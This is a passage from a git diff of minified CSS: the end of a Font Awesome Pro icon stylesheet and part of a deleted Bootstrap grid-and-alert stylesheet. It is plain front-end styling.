lt-fast:after{content:"\10f625"}.fad.fa-tachometer-alt-fastest:after{content:"\10f626"}.fad.fa-tachometer-alt-slow:after{content:"\10f627"}.fad.fa-tachometer-alt-slowest:after{content:"\10f628"}.fad.fa-tachometer-average:after{content:"\10f629"}.fad.fa-tachometer-fast:after{content:"\10f62a"}.fad.fa-tachometer-fastest:after{content:"\10f62b"}.fad.fa-tachometer-slow:after{content:"\10f62c"}.fad.fa-tachometer-slowest:after{content:"\10f62d"}.fad.fa-taco:after{content:"\10f826"}.fad.fa-tag:after{content:"\10f02b"}.fad.fa-tags:after{content:"\10f02c"}.fad.fa-tally:after{content:"\10f69c"}.fad.fa-tanakh:after{content:"\10f827"}.fad.fa-tape:after{content:"\10f4db"}.fad.fa-tasks:after{content:"\10f0ae"}.fad.fa-tasks-alt:after{content:"\10f828"}.fad.fa-taxi:after{content:"\10f1ba"}.fad.fa-teeth:after{content:"\10f62e"}.fad.fa-teeth-open:after{content:"\10f62f"}.fad.fa-telescope:after{content:"\10e03e"}.fad.fa-temperature-down:after{content:"\10e03f"}.fad.fa-temperature-frigid:after{content:"\10f768"}.fad.fa-temperature-high:after{content:"\10f769"}.fad.fa-temperature-hot:after{content:"\10f76a"}.fad.fa-temperature-low:after{content:"\10f76b"}.fad.fa-temperature-up:after{content:"\10e040"}.fad.fa-tenge:after{content:"\10f7d7"}.fad.fa-tennis-ball:after{content:"\10f45e"}.fad.fa-terminal:after{content:"\10f120"}.fad.fa-text:after{content:"\10f893"}.fad.fa-text-height:after{content:"\10f034"}.fad.fa-text-size:after{content:"\10f894"}.fad.fa-text-width:after{content:"\10f035"}.fad.fa-th:after{content:"\10f00a"}.fad.fa-th-large:after{content:"\10f009"}.fad.fa-th-list:after{content:"\10f00b"}.fad.fa-theater-masks:after{content:"\10f630"}.fad.fa-thermometer:after{content:"\10f491"}.fad.fa-thermometer-empty:after{content:"\10f2cb"}.fad.fa-thermometer-full:after{content:"\10f2c7"}.fad.fa-thermometer-half:after{content:"\10f2c9"}.fad.fa-thermometer-quarter:after{content:"\10f2ca"}.fad.fa-thermometer-three-quarters:after{content:"\10f2c8"}.fad.fa-theta:after{content:"\10f69e"}.fad.fa-thumbs-down:after{content:"\10f165"}.fad.fa-thumbs-up:after{content:"\10f164"}.fad.fa-thumbtack:after{content:"\10f08d"}.fad.fa-thunderstorm:after{content:"\10f76c"}.fad.fa-thunderstorm-moon:after{content:"\10f76d"}.fad.fa-thunderstorm-sun:after{content:"\10f76e"}.fad.fa-ticket:after{content:"\10f145"}.fad.fa-ticket-alt:after{content:"\10f3ff"}.fad.fa-tilde:after{content:"\10f69f"}.fad.fa-times:after{content:"\10f00d"}.fad.fa-times-circle:after{content:"\10f057"}.fad.fa-times-hexagon:after{content:"\10f2ee"}.fad.fa-times-octagon:after{content:"\10f2f0"}.fad.fa-times-square:after{content:"\10f2d3"}.fad.fa-tint:after{content:"\10f043"}.fad.fa-tint-slash:after{content:"\10f5c7"}.fad.fa-tire:after{content:"\10f631"}.fad.fa-tire-flat:after{content:"\10f632"}.fad.fa-tire-pressure-warning:after{content:"\10f633"}.fad.fa-tire-rugged:after{content:"\10f634"}.fad.fa-tired:after{content:"\10f5c8"}.fad.fa-toggle-off:after{content:"\10f204"}.fad.fa-toggle-on:after{content:"\10f205"}.fad.fa-toilet:after{content:"\10f7d8"}.fad.fa-toilet-paper:after{content:"\10f71e"}.fad.fa-toilet-paper-alt:after{content:"\10f71f"}.fad.fa-toilet-paper-slash:after{content:"\10e072"}.fad.fa-tombstone:after{content:"\10f720"}.fad.fa-tombstone-alt:after{content:"\10f721"}.fad.fa-toolbox:after{content:"\10f552"}.fad.fa-tools:after{content:"\10f7d9"}.fad.fa-tooth:after{content:"\10f5c9"}.fad.fa-toothbrush:after{content:"\10f635"}.fad.fa-torah:after{content:"\10f6a0"}.fad.fa-torii-gate:after{content:"\10f6a1"}.fad.fa-tornado:after{content:"\10f76f"}.fad.fa-tractor:after{content:"\10f722"}.fad.fa-trademark:after{content:"\10f25c"}.fad.fa-traffic-cone:after{content:"\10f636"}.fad.fa-traffic-light:after{content:"\10f637"}.fad.fa-traffic-light-go:after{content:"\10f638"}.fad.fa-traffic-light-slow:after{content:"\10f639"}.fad.fa-traffic-light-stop:after{content:"\10f63a"}.fad.fa-trailer:after{content:"\10e041"}.fad.fa-train:after{content:"\10f238"}.fad.fa-tram:after{content:"\10f7da"}.fad.fa-transgender:after{content:"\10f224"}.fad.fa-transgender-alt:after{content:"\10f225"}.fad.fa-transporter:after{content:"\10e042"}.fad.fa-transporter-1:after{content:"\10e043"}.fad.fa-transporter-2:after{content:"\10e044"}.fad.fa-transporter-3:after{content:"\10e045"}.fad.fa-transporter-empty:after{content:"\10e046"}.fad.fa-trash:after{content:"\10f1f8"}.fad.fa-trash-alt:after{content:"\10f2ed"}.fad.fa-trash-restore:after{content:"\10f829"}.fad.fa-trash-restore-alt:after{content:"\10f82a"}.fad.fa-trash-undo:after{content:"\10f895"}.fad.fa-trash-undo-alt:after{content:"\10f896"}.fad.fa-treasure-chest:after{content:"\10f723"}.fad.fa-tree:after{content:"\10f1bb"}.fad.fa-tree-alt:after{content:"\10f400"}.fad.fa-tree-christmas:after{content:"\10f7db"}.fad.fa-tree-decorated:after{content:"\10f7dc"}.fad.fa-tree-large:after{content:"\10f7dd"}.fad.fa-tree-palm:after{content:"\10f82b"}.fad.fa-trees:after{content:"\10f724"}.fad.fa-triangle:after{content:"\10f2ec"}.fad.fa-triangle-music:after{content:"\10f8e2"}.fad.fa-trophy:after{content:"\10f091"}.fad.fa-trophy-alt:after{content:"\10f2eb"}.fad.fa-truck:after{content:"\10f0d1"}.fad.fa-truck-container:after{content:"\10f4dc"}.fad.fa-truck-couch:after{content:"\10f4dd"}.fad.fa-truck-loading:after{content:"\10f4de"}.fad.fa-truck-monster:after{content:"\10f63b"}.fad.fa-truck-moving:after{content:"\10f4df"}.fad.fa-truck-pickup:after{content:"\10f63c"}.fad.fa-truck-plow:after{content:"\10f7de"}.fad.fa-truck-ramp:after{content:"\10f4e0"}.fad.fa-trumpet:after{content:"\10f8e3"}.fad.fa-tshirt:after{content:"\10f553"}.fad.fa-tty:after{content:"\10f1e4"}.fad.fa-turkey:after{content:"\10f725"}.fad.fa-turntable:after{content:"\10f8e4"}.fad.fa-turtle:after{content:"\10f726"}.fad.fa-tv:after{content:"\10f26c"}.fad.fa-tv-alt:after{content:"\10f8e5"}.fad.fa-tv-music:after{content:"\10f8e6"}.fad.fa-tv-retro:after{content:"\10f401"}.fad.fa-typewriter:after{content:"\10f8e7"}.fad.fa-ufo:after{content:"\10e047"}.fad.fa-ufo-beam:after{content:"\10e048"}.fad.fa-umbrella:after{content:"\10f0e9"}.fad.fa-umbrella-beach:after{content:"\10f5ca"}.fad.fa-underline:after{content:"\10f0cd"}.fad.fa-undo:after{content:"\10f0e2"}.fad.fa-undo-alt:after{content:"\10f2ea"}.fad.fa-unicorn:after{content:"\10f727"}.fad.fa-union:after{content:"\10f6a2"}.fad.fa-universal-access:after{content:"\10f29a"}.fad.fa-university:after{content:"\10f19c"}.fad.fa-unlink:after{content:"\10f127"}.fad.fa-unlock:after{content:"\10f09c"}.fad.fa-unlock-alt:after{content:"\10f13e"}.fad.fa-upload:after{content:"\10f093"}.fad.fa-usb-drive:after{content:"\10f8e9"}.fad.fa-usd-circle:after{content:"\10f2e8"}.fad.fa-usd-square:after{content:"\10f2e9"}.fad.fa-user:after{content:"\10f007"}.fad.fa-user-alien:after{content:"\10e04a"}.fad.fa-user-alt:after{content:"\10f406"}.fad.fa-user-alt-slash:after{content:"\10f4fa"}.fad.fa-user-astronaut:after{content:"\10f4fb"}.fad.fa-user-chart:after{content:"\10f6a3"}.fad.fa-user-check:after{content:"\10f4fc"}.fad.fa-user-circle:after{content:"\10f2bd"}.fad.fa-user-clock:after{content:"\10f4fd"}.fad.fa-user-cog:after{content:"\10f4fe"}.fad.fa-user-cowboy:after{content:"\10f8ea"}.fad.fa-user-crown:after{content:"\10f6a4"}.fad.fa-user-edit:after{content:"\10f4ff"}.fad.fa-user-friends:after{content:"\10f500"}.fad.fa-user-graduate:after{content:"\10f501"}.fad.fa-user-hard-hat:after{content:"\10f82c"}.fad.fa-user-headset:after{content:"\10f82d"}.fad.fa-user-injured:after{content:"\10f728"}.fad.fa-user-lock:after{content:"\10f502"}.fad.fa-user-md:after{content:"\10f0f0"}.fad.fa-user-md-chat:after{content:"\10f82e"}.fad.fa-user-minus:after{content:"\10f503"}.fad.fa-user-music:after{content:"\10f8eb"}.fad.fa-user-ninja:after{content:"\10f504"}.fad.fa-user-nurse:after{content:"\10f82f"}.fad.fa-user-plus:after{content:"\10f234"}.fad.fa-user-robot:after{content:"\10e04b"}.fad.fa-user-secret:after{content:"\10f21b"}.fad.fa-user-shield:after{content:"\10f505"}.fad.fa-user-slash:after{content:"\10f506"}.fad.fa-user-tag:after{content:"\10f507"}.fad.fa-user-tie:after{content:"\10f508"}.fad.fa-user-times:after{content:"\10f235"}.fad.fa-user-unlock:after{content:"\10e058"}.fad.fa-user-visor:after{content:"\10e04c"}.fad.fa-users:after{content:"\10f0c0"}.fad.fa-users-class:after{content:"\10f63d"}.fad.fa-users-cog:after{content:"\10f509"}.fad.fa-users-crown:after{content:"\10f6a5"}.fad.fa-users-medical:after{content:"\10f830"}.fad.fa-users-slash:after{content:"\10e073"}.fad.fa-utensil-fork:after{content:"\10f2e3"}.fad.fa-utensil-knife:after{content:"\10f2e4"}.fad.fa-utensil-spoon:after{content:"\10f2e5"}.fad.fa-utensils:after{content:"\10f2e7"}.fad.fa-utensils-alt:after{content:"\10f2e6"}.fad.fa-vacuum:after{content:"\10e04d"}.fad.fa-vacuum-robot:after{content:"\10e04e"}.fad.fa-value-absolute:after{content:"\10f6a6"}.fad.fa-vector-square:after{content:"\10f5cb"}.fad.fa-venus:after{content:"\10f221"}.fad.fa-venus-double:after{content:"\10f226"}.fad.fa-venus-mars:after{content:"\10f228"}.fad.fa-vest:after{content:"\10e085"}.fad.fa-vest-patches:after{content:"\10e086"}.fad.fa-vhs:after{content:"\10f8ec"}.fad.fa-vial:after{content:"\10f492"}.fad.fa-vials:after{content:"\10f493"}.fad.fa-video:after{content:"\10f03d"}.fad.fa-video-plus:after{content:"\10f4e1"}.fad.fa-video-slash:after{content:"\10f4e2"}.fad.fa-vihara:after{content:"\10f6a7"}.fad.fa-violin:after{content:"\10f8ed"}.fad.fa-virus:after{content:"\10e074"}.fad.fa-virus-slash:after{content:"\10e075"}.fad.fa-viruses:after{content:"\10e076"}.fad.fa-voicemail:after{content:"\10f897"}.fad.fa-volcano:after{content:"\10f770"}.fad.fa-volleyball-ball:after{content:"\10f45f"}.fad.fa-volume:after{content:"\10f6a8"}.fad.fa-volume-down:after{content:"\10f027"}.fad.fa-volume-mute:after{content:"\10f6a9"}.fad.fa-volume-off:after{content:"\10f026"}.fad.fa-volume-slash:after{content:"\10f2e2"}.fad.fa-volume-up:after{content:"\10f028"}.fad.fa-vote-nay:after{content:"\10f771"}.fad.fa-vote-yea:after{content:"\10f772"}.fad.fa-vr-cardboard:after{content:"\10f729"}.fad.fa-wagon-covered:after{content:"\10f8ee"}.fad.fa-walker:after{content:"\10f831"}.fad.fa-walkie-talkie:after{content:"\10f8ef"}.fad.fa-walking:after{content:"\10f554"}.fad.fa-wallet:after{content:"\10f555"}.fad.fa-wand:after{content:"\10f72a"}.fad.fa-wand-magic:after{content:"\10f72b"}.fad.fa-warehouse:after{content:"\10f494"}.fad.fa-warehouse-alt:after{content:"\10f495"}.fad.fa-washer:after{content:"\10f898"}.fad.fa-watch:after{content:"\10f2e1"}.fad.fa-watch-calculator:after{content:"\10f8f0"}.fad.fa-watch-fitness:after{content:"\10f63e"}.fad.fa-water:after{content:"\10f773"}.fad.fa-water-lower:after{content:"\10f774"}.fad.fa-water-rise:after{content:"\10f775"}.fad.fa-wave-sine:after{content:"\10f899"}.fad.fa-wave-square:after{content:"\10f83e"}.fad.fa-wave-triangle:after{content:"\10f89a"}.fad.fa-waveform:after{content:"\10f8f1"}.fad.fa-waveform-path:after{content:"\10f8f2"}.fad.fa-webcam:after{content:"\10f832"}.fad.fa-webcam-slash:after{content:"\10f833"}.fad.fa-weight:after{content:"\10f496"}.fad.fa-weight-hanging:after{content:"\10f5cd"}.fad.fa-whale:after{content:"\10f72c"}.fad.fa-wheat:after{content:"\10f72d"}.fad.fa-wheelchair:after{content:"\10f193"}.fad.fa-whistle:after{content:"\10f460"}.fad.fa-wifi:after{content:"\10f1eb"}.fad.fa-wifi-1:after{content:"\10f6aa"}.fad.fa-wifi-2:after{content:"\10f6ab"}.fad.fa-wifi-slash:after{content:"\10f6ac"}.fad.fa-wind:after{content:"\10f72e"}.fad.fa-wind-turbine:after{content:"\10f89b"}.fad.fa-wind-warning:after{content:"\10f776"}.fad.fa-window:after{content:"\10f40e"}.fad.fa-window-alt:after{content:"\10f40f"}.fad.fa-window-close:after{content:"\10f410"}.fad.fa-window-frame:after{content:"\10e04f"}.fad.fa-window-frame-open:after{content:"\10e050"}.fad.fa-window-maximize:after{content:"\10f2d0"}.fad.fa-window-minimize:after{content:"\10f2d1"}.fad.fa-window-restore:after{content:"\10f2d2"}.fad.fa-windsock:after{content:"\10f777"}.fad.fa-wine-bottle:after{content:"\10f72f"}.fad.fa-wine-glass:after{content:"\10f4e3"}.fad.fa-wine-glass-alt:after{content:"\10f5ce"}.fad.fa-won-sign:after{content:"\10f159"}.fad.fa-wreath:after{content:"\10f7e2"}.fad.fa-wrench:after{content:"\10f0ad"}.fad.fa-x-ray:after{content:"\10f497"}.fad.fa-yen-sign:after{content:"\10f157"}.fad.fa-yin-yang:after{content:"\10f6ad"}@font-face{font-family:"Font Awesome 5 Pro";font-style:normal;font-weight:300;font-display:block;src:url(../fonts/fa-light-300.eot);src:url(../fonts/fa-light-300.eot#iefix) format("embedded-opentype"),url(../fonts/fa-light-300.woff2) format("woff2"),url(../fonts/fa-light-300.woff) format("woff"),url(../fonts/fa-light-300.ttf) format("truetype"),url(../images/fa-light-300.svg#fontawesome) format("svg")}.fal{font-weight:300}@font-face{font-family:"Font Awesome 5 Pro";font-style:normal;font-weight:400;font-display:block;src:url(../fonts/fa-regular-400.eot);src:url(../fonts/fa-regular-400.eot#iefix) format("embedded-opentype"),url(../fonts/fa-regular-400.woff2) format("woff2"),url(../fonts/fa-regular-400.woff) format("woff"),url(../fonts/fa-regular-400.ttf) format("truetype"),url(../images/fa-regular-400.svg#fontawesome) format("svg")}.fal,.far{font-family:"Font Awesome 5 Pro"}.far{font-weight:400}@font-face{font-family:"Font Awesome 5 Pro";font-style:normal;font-weight:900;font-display:block;src:url(../fonts/fa-solid-900.eot);src:url(../fonts/fa-solid-900.eot#iefix) format("embedded-opentype"),url(../fonts/fa-solid-900.woff2) format("woff2"),url(../fonts/fa-solid-900.woff) format("woff"),url(../fonts/fa-solid-900.ttf) format("truetype"),url(../images/fa-solid-900.svg#fontawesome) format("svg")}.fa,.fas{font-family:"Font Awesome 5 Pro";font-weight:900} \ No newline at end of file diff --git a/old/css/bootstrap.publicmin.css b/old/css/bootstrap.publicmin.css deleted file mode 100644 index 6988b19..0000000 --- a/old/css/bootstrap.publicmin.css +++ /dev/null @@ -1 +0,0 @@ -.container{width:100%;padding-right:15px;padding-left:15px;margin-right:auto;margin-left:auto}@media(min-width: 576px){.container{max-width:540px}}@media(min-width: 768px){.container{max-width:720px}}@media(min-width: 992px){.container{max-width:960px}}@media(min-width: 1200px){.container{max-width:1140px}}.container-fluid,.container-xl,.container-lg,.container-md,.container-sm{width:100%;padding-right:15px;padding-left:15px;margin-right:auto;margin-left:auto}@media(min-width: 576px){.container-sm,.container{max-width:540px}}@media(min-width: 768px){.container-md,.container-sm,.container{max-width:720px}}@media(min-width: 992px){.container-lg,.container-md,.container-sm,.container{max-width:960px}}@media(min-width: 1200px){.container-xl,.container-lg,.container-md,.container-sm,.container{max-width:1140px}}.row{display:flex;flex-wrap:wrap;margin-right:-15px;margin-left:-15px}.no-gutters{margin-right:0;margin-left:0}.no-gutters>.col,.no-gutters>[class*=col-]{padding-right:0;padding-left:0}.col-xl,.col-xl-auto,.col-xl-12,.col-xl-11,.col-xl-10,.col-xl-9,.col-xl-8,.col-xl-7,.col-xl-6,.col-xl-5,.col-xl-4,.col-xl-3,.col-xl-2,.col-xl-1,.col-lg,.col-lg-auto,.col-lg-12,.col-lg-11,.col-lg-10,.col-lg-9,.col-lg-8,.col-lg-7,.col-lg-6,.col-lg-5,.col-lg-4,.col-lg-3,.col-lg-2,.col-lg-1,.col-md,.col-md-auto,.col-md-12,.col-md-11,.col-md-10,.col-md-9,.col-md-8,.col-md-7,.col-md-6,.col-md-5,.col-md-4,.col-md-3,.col-md-2,.col-md-1,.col-sm,.col-sm-auto,.col-sm-12,.col-sm-11,.col-sm-10,.col-sm-9,.col-sm-8,.col-sm-7,.col-sm-6,.col-sm-5,.col-sm-4,.col-sm-3,.col-sm-2,.col-sm-1,.col,.col-auto,.col-12,.col-11,.col-10,.col-9,.col-8,.col-7,.col-6,.col-5,.col-4,.col-3,.col-2,.col-1{position:relative;width:100%;padding-right:15px;padding-left:15px}.col{flex-basis:0;flex-grow:1;min-width:0;max-width:100%}.row-cols-1>*{flex:0 0 100%;max-width:100%}.row-cols-2>*{flex:0 0 50%;max-width:50%}.row-cols-3>*{flex:0 0 33.3333333333%;max-width:33.3333333333%}.row-cols-4>*{flex:0 0 25%;max-width:25%}.row-cols-5>*{flex:0 0 20%;max-width:20%}.row-cols-6>*{flex:0 0 16.6666666667%;max-width:16.6666666667%}.col-auto{flex:0 0 auto;width:auto;max-width:100%}.col-1{flex:0 0 8.3333333333%;max-width:8.3333333333%}.col-2{flex:0 0 16.6666666667%;max-width:16.6666666667%}.col-3{flex:0 0 25%;max-width:25%}.col-4{flex:0 0 33.3333333333%;max-width:33.3333333333%}.col-5{flex:0 0 41.6666666667%;max-width:41.6666666667%}.col-6{flex:0 0 50%;max-width:50%}.col-7{flex:0 0 58.3333333333%;max-width:58.3333333333%}.col-8{flex:0 0 66.6666666667%;max-width:66.6666666667%}.col-9{flex:0 0 75%;max-width:75%}.col-10{flex:0 0 83.3333333333%;max-width:83.3333333333%}.col-11{flex:0 0 91.6666666667%;max-width:91.6666666667%}.col-12{flex:0 0 100%;max-width:100%}.order-first{order:-1}.order-last{order:13}.order-0{order:0}.order-1{order:1}.order-2{order:2}.order-3{order:3}.order-4{order:4}.order-5{order:5}.order-6{order:6}.order-7{order:7}.order-8{order:8}.order-9{order:9}.order-10{order:10}.order-11{order:11}.order-12{order:12}.offset-1{margin-left:8.3333333333%}.offset-2{margin-left:16.6666666667%}.offset-3{margin-left:25%}.offset-4{margin-left:33.3333333333%}.offset-5{margin-left:41.6666666667%}.offset-6{margin-left:50%}.offset-7{margin-left:58.3333333333%}.offset-8{margin-left:66.6666666667%}.offset-9{margin-left:75%}.offset-10{margin-left:83.3333333333%}.offset-11{margin-left:91.6666666667%}@media(min-width: 576px){.col-sm{flex-basis:0;flex-grow:1;min-width:0;max-width:100%}.row-cols-sm-1>*{flex:0 0 100%;max-width:100%}.row-cols-sm-2>*{flex:0 0 50%;max-width:50%}.row-cols-sm-3>*{flex:0 0 33.3333333333%;max-width:33.3333333333%}.row-cols-sm-4>*{flex:0 0 25%;max-width:25%}.row-cols-sm-5>*{flex:0 0 20%;max-width:20%}.row-cols-sm-6>*{flex:0 0 16.6666666667%;max-width:16.6666666667%}.col-sm-auto{flex:0 0 auto;width:auto;max-width:100%}.col-sm-1{flex:0 0 8.3333333333%;max-width:8.3333333333%}.col-sm-2{flex:0 0 16.6666666667%;max-width:16.6666666667%}.col-sm-3{flex:0 0 25%;max-width:25%}.col-sm-4{flex:0 0 33.3333333333%;max-width:33.3333333333%}.col-sm-5{flex:0 0 41.6666666667%;max-width:41.6666666667%}.col-sm-6{flex:0 0 50%;max-width:50%}.col-sm-7{flex:0 0 58.3333333333%;max-width:58.3333333333%}.col-sm-8{flex:0 0 66.6666666667%;max-width:66.6666666667%}.col-sm-9{flex:0 0 75%;max-width:75%}.col-sm-10{flex:0 0 83.3333333333%;max-width:83.3333333333%}.col-sm-11{flex:0 0 91.6666666667%;max-width:91.6666666667%}.col-sm-12{flex:0 0 100%;max-width:100%}.order-sm-first{order:-1}.order-sm-last{order:13}.order-sm-0{order:0}.order-sm-1{order:1}.order-sm-2{order:2}.order-sm-3{order:3}.order-sm-4{order:4}.order-sm-5{order:5}.order-sm-6{order:6}.order-sm-7{order:7}.order-sm-8{order:8}.order-sm-9{order:9}.order-sm-10{order:10}.order-sm-11{order:11}.order-sm-12{order:12}.offset-sm-0{margin-left:0}.offset-sm-1{margin-left:8.3333333333%}.offset-sm-2{margin-left:16.6666666667%}.offset-sm-3{margin-left:25%}.offset-sm-4{margin-left:33.3333333333%}.offset-sm-5{margin-left:41.6666666667%}.offset-sm-6{margin-left:50%}.offset-sm-7{margin-left:58.3333333333%}.offset-sm-8{margin-left:66.6666666667%}.offset-sm-9{margin-left:75%}.offset-sm-10{margin-left:83.3333333333%}.offset-sm-11{margin-left:91.6666666667%}}@media(min-width: 768px){.col-md{flex-basis:0;flex-grow:1;min-width:0;max-width:100%}.row-cols-md-1>*{flex:0 0 100%;max-width:100%}.row-cols-md-2>*{flex:0 0 50%;max-width:50%}.row-cols-md-3>*{flex:0 0 33.3333333333%;max-width:33.3333333333%}.row-cols-md-4>*{flex:0 0 25%;max-width:25%}.row-cols-md-5>*{flex:0 0 20%;max-width:20%}.row-cols-md-6>*{flex:0 0 16.6666666667%;max-width:16.6666666667%}.col-md-auto{flex:0 0 auto;width:auto;max-width:100%}.col-md-1{flex:0 0 8.3333333333%;max-width:8.3333333333%}.col-md-2{flex:0 0 16.6666666667%;max-width:16.6666666667%}.col-md-3{flex:0 0 25%;max-width:25%}.col-md-4{flex:0 0 33.3333333333%;max-width:33.3333333333%}.col-md-5{flex:0 0 41.6666666667%;max-width:41.6666666667%}.col-md-6{flex:0 0 50%;max-width:50%}.col-md-7{flex:0 0 58.3333333333%;max-width:58.3333333333%}.col-md-8{flex:0 0 66.6666666667%;max-width:66.6666666667%}.col-md-9{flex:0 0 75%;max-width:75%}.col-md-10{flex:0 0 83.3333333333%;max-width:83.3333333333%}.col-md-11{flex:0 0 91.6666666667%;max-width:91.6666666667%}.col-md-12{flex:0 0 100%;max-width:100%}.order-md-first{order:-1}.order-md-last{order:13}.order-md-0{order:0}.order-md-1{order:1}.order-md-2{order:2}.order-md-3{order:3}.order-md-4{order:4}.order-md-5{order:5}.order-md-6{order:6}.order-md-7{order:7}.order-md-8{order:8}.order-md-9{order:9}.order-md-10{order:10}.order-md-11{order:11}.order-md-12{order:12}.offset-md-0{margin-left:0}.offset-md-1{margin-left:8.3333333333%}.offset-md-2{margin-left:16.6666666667%}.offset-md-3{margin-left:25%}.offset-md-4{margin-left:33.3333333333%}.offset-md-5{margin-left:41.6666666667%}.offset-md-6{margin-left:50%}.offset-md-7{margin-left:58.3333333333%}.offset-md-8{margin-left:66.6666666667%}.offset-md-9{margin-left:75%}.offset-md-10{margin-left:83.3333333333%}.offset-md-11{margin-left:91.6666666667%}}@media(min-width: 992px){.col-lg{flex-basis:0;flex-grow:1;min-width:0;max-width:100%}.row-cols-lg-1>*{flex:0 0 100%;max-width:100%}.row-cols-lg-2>*{flex:0 0 50%;max-width:50%}.row-cols-lg-3>*{flex:0 0 33.3333333333%;max-width:33.3333333333%}.row-cols-lg-4>*{flex:0 0 25%;max-width:25%}.row-cols-lg-5>*{flex:0 0 20%;max-width:20%}.row-cols-lg-6>*{flex:0 0 16.6666666667%;max-width:16.6666666667%}.col-lg-auto{flex:0 0 auto;width:auto;max-width:100%}.col-lg-1{flex:0 0 8.3333333333%;max-width:8.3333333333%}.col-lg-2{flex:0 0 16.6666666667%;max-width:16.6666666667%}.col-lg-3{flex:0 0 25%;max-width:25%}.col-lg-4{flex:0 0 33.3333333333%;max-width:33.3333333333%}.col-lg-5{flex:0 0 41.6666666667%;max-width:41.6666666667%}.col-lg-6{flex:0 0 50%;max-width:50%}.col-lg-7{flex:0 0 58.3333333333%;max-width:58.3333333333%}.col-lg-8{flex:0 0 66.6666666667%;max-width:66.6666666667%}.col-lg-9{flex:0 0 75%;max-width:75%}.col-lg-10{flex:0 0 83.3333333333%;max-width:83.3333333333%}.col-lg-11{flex:0 0 91.6666666667%;max-width:91.6666666667%}.col-lg-12{flex:0 0 100%;max-width:100%}.order-lg-first{order:-1}.order-lg-last{order:13}.order-lg-0{order:0}.order-lg-1{order:1}.order-lg-2{order:2}.order-lg-3{order:3}.order-lg-4{order:4}.order-lg-5{order:5}.order-lg-6{order:6}.order-lg-7{order:7}.order-lg-8{order:8}.order-lg-9{order:9}.order-lg-10{order:10}.order-lg-11{order:11}.order-lg-12{order:12}.offset-lg-0{margin-left:0}.offset-lg-1{margin-left:8.3333333333%}.offset-lg-2{margin-left:16.6666666667%}.offset-lg-3{margin-left:25%}.offset-lg-4{margin-left:33.3333333333%}.offset-lg-5{margin-left:41.6666666667%}.offset-lg-6{margin-left:50%}.offset-lg-7{margin-left:58.3333333333%}.offset-lg-8{margin-left:66.6666666667%}.offset-lg-9{margin-left:75%}.offset-lg-10{margin-left:83.3333333333%}.offset-lg-11{margin-left:91.6666666667%}}@media(min-width: 1200px){.col-xl{flex-basis:0;flex-grow:1;min-width:0;max-width:100%}.row-cols-xl-1>*{flex:0 0 100%;max-width:100%}.row-cols-xl-2>*{flex:0 0 50%;max-width:50%}.row-cols-xl-3>*{flex:0 0 33.3333333333%;max-width:33.3333333333%}.row-cols-xl-4>*{flex:0 0 25%;max-width:25%}.row-cols-xl-5>*{flex:0 0 20%;max-width:20%}.row-cols-xl-6>*{flex:0 0 16.6666666667%;max-width:16.6666666667%}.col-xl-auto{flex:0 0 auto;width:auto;max-width:100%}.col-xl-1{flex:0 0 8.3333333333%;max-width:8.3333333333%}.col-xl-2{flex:0 0 16.6666666667%;max-width:16.6666666667%}.col-xl-3{flex:0 0 25%;max-width:25%}.col-xl-4{flex:0 0 33.3333333333%;max-width:33.3333333333%}.col-xl-5{flex:0 0 41.6666666667%;max-width:41.6666666667%}.col-xl-6{flex:0 0 50%;max-width:50%}.col-xl-7{flex:0 0 58.3333333333%;max-width:58.3333333333%}.col-xl-8{flex:0 0 66.6666666667%;max-width:66.6666666667%}.col-xl-9{flex:0 0 75%;max-width:75%}.col-xl-10{flex:0 0 83.3333333333%;max-width:83.3333333333%}.col-xl-11{flex:0 0 91.6666666667%;max-width:91.6666666667%}.col-xl-12{flex:0 0 100%;max-width:100%}.order-xl-first{order:-1}.order-xl-last{order:13}.order-xl-0{order:0}.order-xl-1{order:1}.order-xl-2{order:2}.order-xl-3{order:3}.order-xl-4{order:4}.order-xl-5{order:5}.order-xl-6{order:6}.order-xl-7{order:7}.order-xl-8{order:8}.order-xl-9{order:9}.order-xl-10{order:10}.order-xl-11{order:11}.order-xl-12{order:12}.offset-xl-0{margin-left:0}.offset-xl-1{margin-left:8.3333333333%}.offset-xl-2{margin-left:16.6666666667%}.offset-xl-3{margin-left:25%}.offset-xl-4{margin-left:33.3333333333%}.offset-xl-5{margin-left:41.6666666667%}.offset-xl-6{margin-left:50%}.offset-xl-7{margin-left:58.3333333333%}.offset-xl-8{margin-left:66.6666666667%}.offset-xl-9{margin-left:75%}.offset-xl-10{margin-left:83.3333333333%}.offset-xl-11{margin-left:91.6666666667%}}.alert{position:relative;padding:.75rem 1.25rem;margin-bottom:1rem;border:1px solid rgba(0,0,0,0);border-radius:.25rem}.alert-heading{color:inherit}.alert-link{font-weight:700}.alert-dismissible{padding-right:4rem}.alert-dismissible .close{position:absolute;top:0;right:0;padding:.75rem 1.25rem;color:inherit}.alert-primary{color:#106185;background-color:#d2f1ff;border-color:#c0ecff}.alert-primary hr{border-top-color:#a7e4ff}.alert-primary .alert-link{color:#0b4057}.alert-secondary{color:#474747;background-color:#e7e7e7;border-color:#dedede}.alert-secondary hr{border-top-color:#d1d1d1}.alert-secondary .alert-link{color:#2e2e2e}.alert-success{color:#155724;background-color:#d4edda;border-color:#c3e6cb}.alert-success hr{border-top-color:#b1dfbb}.alert-success .alert-link{color:#0b2e13}.alert-info{color:#0c5460;background-color:#d1ecf1;border-color:#bee5eb}.alert-info hr{border-top-color:#abdde5}.alert-info .alert-link{color:#062c33}.alert-warning{color:#856404;background-color:#fff3cd;border-color:#ffeeba}.alert-warning hr{border-top-color:#ffe8a1}.alert-warning .alert-link{color:#533f03}.alert-danger{color:#721c24;background-color:#f8d7da;border-color:#f5c6cb}.alert-danger hr{border-top-color:#f1b0b7}.alert-danger .alert-link{color:#491217}.alert-light{color:#83817f;background-color:#fefefd;border-color:#fefdfc}.alert-light hr{border-top-color:#f8f0e9}.alert-light .alert-link{color:#696866}.alert-dark{color:#1b1e21;background-color:#d6d8d9;border-color:#c6c8ca}.alert-dark hr{border-top-color:#b9bbbe}.alert-dark .alert-link{color:#040505}.alert-black{color:#000;background-color:#ccc;border-color:#b8b8b8}.alert-black hr{border-top-color:#ababab}.alert-black .alert-link{color:#000}.alert-darkgrey{color:#121010;background-color:#d3d2d2;border-color:#c1c0c0}.alert-darkgrey hr{border-top-color:#b4b3b3}.alert-darkgrey .alert-link{color:#000}.alert-sublime{color:#16191f;background-color:#d4d6d8;border-color:#c3c5c8}.alert-sublime hr{border-top-color:#b6b8bc}.alert-sublime .alert-link{color:#010101}.alert-neongreen{color:#187138;background-color:#d5f8e1;border-color:#c4f5d6}.alert-neongreen hr{border-top-color:#aef1c7}.alert-neongreen 